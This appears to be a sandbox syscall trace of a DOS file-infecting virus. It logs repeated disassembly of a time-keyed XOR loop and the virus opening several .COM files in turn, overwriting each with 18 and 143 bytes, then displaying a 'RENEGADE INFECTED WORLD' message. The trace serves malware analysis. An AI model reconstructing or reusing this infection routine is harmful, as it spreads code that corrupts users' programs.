.
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-17T23:07:39.249887082Z | 44 | PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl 0x12a5d: mov si, 0x112 0x12a60: mov di, 0x1ab 0x12a63: mov cx, 0x8f 0x12a66: lodsb al, byte ptr [si] 0x12a67: xor al, byte ptr [0x109] 0x12a6b: stosb byte ptr es:[di], al 0x12a6c: dec cx 0x12a6d: cmp cx, -1 0x12a70: jne 0x12a66 0x12a72: pop ax 0x12a73: xor cx, cx 0x12a75: mov dx, 0x19d 0x12a78: int 0x21 0x12a7a: jb 0x12aa3 0x12a7c: mov ax, 0x3d01 0x12a7f: mov dx, 0x9e 0x12a82: int 0x21 0x12a84: mov bx, ax 0x12a86: mov ah, 0x40 |
| 2018-12-17T23:07:39.253256429Z | 78 | PC: 12a7a | Find first file |
| 2018-12-17T23:07:39.260442137Z | 61 | PC: 12a84 | Open file (Filename = 'SLEEP.COM') |
| 2018-12-17T23:07:39.268645592Z | 64 | PC: 12a91 | Write file or device (Write 18 bytes on handle 5) |
| 2018-12-17T23:07:39.276765243Z | 64 | PC: 12a9a | Write file or device (Write 143 bytes on handle 5) |
| 2018-12-17T23:07:39.280748046Z | 62 | PC: 12a9e | Close file |
| 2018-12-17T23:07:39.444942429Z | 44 | PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl 0x12a5d: mov si, 0x112 0x12a60: mov di, 0x1ab 0x12a63: mov cx, 0x8f 0x12a66: lodsb al, byte ptr [si] 0x12a67: xor al, byte ptr [0x109] 0x12a6b: stosb byte ptr es:[di], al 0x12a6c: dec cx 0x12a6d: cmp cx, -1 0x12a70: jne 0x12a66 0x12a72: pop ax 0x12a73: xor cx, cx 0x12a75: mov dx, 0x19d 0x12a78: int 0x21 0x12a7a: jb 0x12aa3 0x12a7c: mov ax, 0x3d01 0x12a7f: mov dx, 0x9e 0x12a82: int 0x21 0x12a84: mov bx, ax 0x12a86: mov ah, 0x40 |
| 2018-12-17T23:07:39.4477713Z | 79 | PC: 12a7a | Find next file |
| 2018-12-17T23:07:39.452552985Z | 61 | PC: 12a84 | Open file (Filename = 'PRINT.S') |
| 2018-12-17T23:07:39.465882267Z | 64 | PC: 12a91 | Write file or device (Write 18 bytes on handle 5) |
| 2018-12-17T23:07:39.475390948Z | 64 | PC: 12a9a | Write file or device (Write 143 bytes on handle 5) |
| 2018-12-17T23:07:39.479440982Z | 62 | PC: 12a9e | Close file |
| 2018-12-17T23:07:39.488794976Z | 44 | PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl 0x12a5d: mov si, 0x112 0x12a60: mov di, 0x1ab 0x12a63: mov cx, 0x8f 0x12a66: lodsb al, byte ptr [si] 0x12a67: xor al, byte ptr [0x109] 0x12a6b: stosb byte ptr es:[di], al 0x12a6c: dec cx 0x12a6d: cmp cx, -1 0x12a70: jne 0x12a66 0x12a72: pop ax 0x12a73: xor cx, cx 0x12a75: mov dx, 0x19d 0x12a78: int 0x21 0x12a7a: jb 0x12aa3 0x12a7c: mov ax, 0x3d01 0x12a7f: mov dx, 0x9e 0x12a82: int 0x21 0x12a84: mov bx, ax 0x12a86: mov ah, 0x40 |
| 2018-12-17T23:07:39.491323864Z | 79 | PC: 12a7a | Find next file |
| 2018-12-17T23:07:39.495587442Z | 61 | PC: 12a84 | Open file (Filename = 'PRINT.COM') |
| 2018-12-17T23:07:39.503838834Z | 64 | PC: 12a91 | Write file or device (Write 18 bytes on handle 5) |
| 2018-12-17T23:07:39.511526455Z | 64 | PC: 12a9a | Write file or device (Write 143 bytes on handle 5) |
| 2018-12-17T23:07:39.515360548Z | 62 | PC: 12a9e | Close file |
| 2018-12-17T23:07:39.524290917Z | 44 | PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl 0x12a5d: mov si, 0x112 0x12a60: mov di, 0x1ab 0x12a63: mov cx, 0x8f 0x12a66: lodsb al, byte ptr [si] 0x12a67: xor al, byte ptr [0x109] 0x12a6b: stosb byte ptr es:[di], al 0x12a6c: dec cx 0x12a6d: cmp cx, -1 0x12a70: jne 0x12a66 0x12a72: pop ax 0x12a73: xor cx, cx 0x12a75: mov dx, 0x19d 0x12a78: int 0x21 0x12a7a: jb 0x12aa3 0x12a7c: mov ax, 0x3d01 0x12a7f: mov dx, 0x9e 0x12a82: int 0x21 0x12a84: mov bx, ax 0x12a86: mov ah, 0x40 |
| 2018-12-17T23:07:39.527155961Z | 79 | PC: 12a7a | Find next file |
| 2018-12-17T23:07:39.531578911Z | 61 | PC: 12a84 | Open file (Filename = 'HELLO.COM') |
| 2018-12-17T23:07:39.539199654Z | 64 | PC: 12a91 | Write file or device (Write 18 bytes on handle 5) |
| 2018-12-17T23:07:39.54693757Z | 64 | PC: 12a9a | Write file or device (Write 143 bytes on handle 5) |
| 2018-12-17T23:07:39.550548016Z | 62 | PC: 12a9e | Close file |
| 2018-12-17T23:07:39.560639773Z | 44 | PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl 0x12a5d: mov si, 0x112 0x12a60: mov di, 0x1ab 0x12a63: mov cx, 0x8f 0x12a66: lodsb al, byte ptr [si] 0x12a67: xor al, byte ptr [0x109] 0x12a6b: stosb byte ptr es:[di], al 0x12a6c: dec cx 0x12a6d: cmp cx, -1 0x12a70: jne 0x12a66 0x12a72: pop ax 0x12a73: xor cx, cx 0x12a75: mov dx, 0x19d 0x12a78: int 0x21 0x12a7a: jb 0x12aa3 0x12a7c: mov ax, 0x3d01 0x12a7f: mov dx, 0x9e 0x12a82: int 0x21 0x12a84: mov bx, ax 0x12a86: mov ah, 0x40 |
| 2018-12-17T23:07:39.56352613Z | 79 | PC: 12a7a | Find next file |
| 2018-12-17T23:07:39.56644867Z | 61 | PC: 12a84 | Open file (Filename = 'PHANG.COM') |
| 2018-12-17T23:07:39.571397032Z | 64 | PC: 12a91 | Write file or device (Write 18 bytes on handle 5) |
| 2018-12-17T23:07:39.575795712Z | 64 | PC: 12a9a | Write file or device (Write 143 bytes on handle 5) |
| 2018-12-17T23:07:39.577814217Z | 62 | PC: 12a9e | Close file |
| 2018-12-17T23:07:39.583811177Z | 44 | PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl 0x12a5d: mov si, 0x112 0x12a60: mov di, 0x1ab 0x12a63: mov cx, 0x8f 0x12a66: lodsb al, byte ptr [si] 0x12a67: xor al, byte ptr [0x109] 0x12a6b: stosb byte ptr es:[di], al 0x12a6c: dec cx 0x12a6d: cmp cx, -1 0x12a70: jne 0x12a66 0x12a72: pop ax 0x12a73: xor cx, cx 0x12a75: mov dx, 0x19d 0x12a78: int 0x21 0x12a7a: jb 0x12aa3 0x12a7c: mov ax, 0x3d01 0x12a7f: mov dx, 0x9e 0x12a82: int 0x21 0x12a84: mov bx, ax 0x12a86: mov ah, 0x40 |
| 2018-12-17T23:07:39.585423623Z | 79 | PC: 12a7a | Find next file |
| 2018-12-17T23:07:39.587595614Z | 61 | PC: 12a84 | Open file (Filename = 'PRINTA~1.COM') |
| 2018-12-17T23:07:39.593486612Z | 64 | PC: 12a91 | Write file or device (Write 18 bytes on handle 5) |
| 2018-12-17T23:07:39.598850344Z | 64 | PC: 12a9a | Write file or device (Write 143 bytes on handle 5) |
| 2018-12-17T23:07:39.600994547Z | 62 | PC: 12a9e | Close file |
| 2018-12-17T23:07:39.623135034Z | 44 | PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl 0x12a5d: mov si, 0x112 0x12a60: mov di, 0x1ab 0x12a63: mov cx, 0x8f 0x12a66: lodsb al, byte ptr [si] 0x12a67: xor al, byte ptr [0x109] 0x12a6b: stosb byte ptr es:[di], al 0x12a6c: dec cx 0x12a6d: cmp cx, -1 0x12a70: jne 0x12a66 0x12a72: pop ax 0x12a73: xor cx, cx 0x12a75: mov dx, 0x19d 0x12a78: int 0x21 0x12a7a: jb 0x12aa3 0x12a7c: mov ax, 0x3d01 0x12a7f: mov dx, 0x9e 0x12a82: int 0x21 0x12a84: mov bx, ax 0x12a86: mov ah, 0x40 |
| 2018-12-17T23:07:39.625123775Z | 79 | PC: 12a7a | Find next file |
| 2018-12-17T23:07:39.627037695Z | 61 | PC: 12a84 | Open file (Filename = 'MANDEL.COM') |
| 2018-12-17T23:07:39.633340164Z | 64 | PC: 12a91 | Write file or device (Write 18 bytes on handle 5) |
| 2018-12-17T23:07:39.638097848Z | 64 | PC: 12a9a | Write file or device (Write 143 bytes on handle 5) |
| 2018-12-17T23:07:39.640054431Z | 62 | PC: 12a9e | Close file |
| 2018-12-17T23:07:39.645595133Z | 44 | PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl 0x12a5d: mov si, 0x112 0x12a60: mov di, 0x1ab 0x12a63: mov cx, 0x8f 0x12a66: lodsb al, byte ptr [si] 0x12a67: xor al, byte ptr [0x109] 0x12a6b: stosb byte ptr es:[di], al 0x12a6c: dec cx 0x12a6d: cmp cx, -1 0x12a70: jne 0x12a66 0x12a72: pop ax 0x12a73: xor cx, cx 0x12a75: mov dx, 0x19d 0x12a78: int 0x21 0x12a7a: jb 0x12aa3 0x12a7c: mov ax, 0x3d01 0x12a7f: mov dx, 0x9e 0x12a82: int 0x21 0x12a84: mov bx, ax 0x12a86: mov ah, 0x40 |
| 2018-12-17T23:07:39.648191245Z | 79 | PC: 12a7a | Find next file |
| 2018-12-17T23:07:39.650126693Z | 61 | PC: 12a84 | Open file (Filename = 'PAH.COM') |
| 2018-12-17T23:07:39.654613048Z | 64 | PC: 12a91 | Write file or device (Write 18 bytes on handle 5) |
| 2018-12-17T23:07:39.659570817Z | 64 | PC: 12a9a | Write file or device (Write 143 bytes on handle 5) |
| 2018-12-17T23:07:39.661589426Z | 62 | PC: 12a9e | Close file |
| 2018-12-17T23:07:39.668219335Z | 44 | PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl 0x12a5d: mov si, 0x112 0x12a60: mov di, 0x1ab 0x12a63: mov cx, 0x8f 0x12a66: lodsb al, byte ptr [si] 0x12a67: xor al, byte ptr [0x109] 0x12a6b: stosb byte ptr es:[di], al 0x12a6c: dec cx 0x12a6d: cmp cx, -1 0x12a70: jne 0x12a66 0x12a72: pop ax 0x12a73: xor cx, cx 0x12a75: mov dx, 0x19d 0x12a78: int 0x21 0x12a7a: jb 0x12aa3 0x12a7c: mov ax, 0x3d01 0x12a7f: mov dx, 0x9e 0x12a82: int 0x21 0x12a84: mov bx, ax 0x12a86: mov ah, 0x40 |
| 2018-12-17T23:07:39.672138418Z | 79 | PC: 12a7a | Find next file |
| 2018-12-17T23:07:39.674399293Z | 61 | PC: 12a84 | Open file (Filename = 'TEST.COM') |
| 2018-12-17T23:07:39.679062677Z | 64 | PC: 12a91 | Write file or device (Write 18 bytes on handle 5) |
| 2018-12-17T23:07:39.681888298Z | 64 | PC: 12a9a | Write file or device (Write 143 bytes on handle 5) |
| 2018-12-17T23:07:39.683972754Z | 62 | PC: 12a9e | Close file |
| 2018-12-17T23:07:39.690348117Z | 44 | PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl 0x12a5d: mov si, 0x112 0x12a60: mov di, 0x1ab 0x12a63: mov cx, 0x8f 0x12a66: lodsb al, byte ptr [si] 0x12a67: xor al, byte ptr [0x109] 0x12a6b: stosb byte ptr es:[di], al 0x12a6c: dec cx 0x12a6d: cmp cx, -1 0x12a70: jne 0x12a66 0x12a72: pop ax 0x12a73: xor cx, cx 0x12a75: mov dx, 0x19d 0x12a78: int 0x21 0x12a7a: jb 0x12aa3 0x12a7c: mov ax, 0x3d01 0x12a7f: mov dx, 0x9e 0x12a82: int 0x21 0x12a84: mov bx, ax 0x12a86: mov ah, 0x40 |
| 2018-12-17T23:07:39.692855123Z | 79 | PC: 12a7a | Find next file |
| 2018-12-17T23:07:39.706931266Z | 9 | PC: 12aac | Display string (String= '...ENTERING RENEGADE INFECTED WORLD..PART ][..') |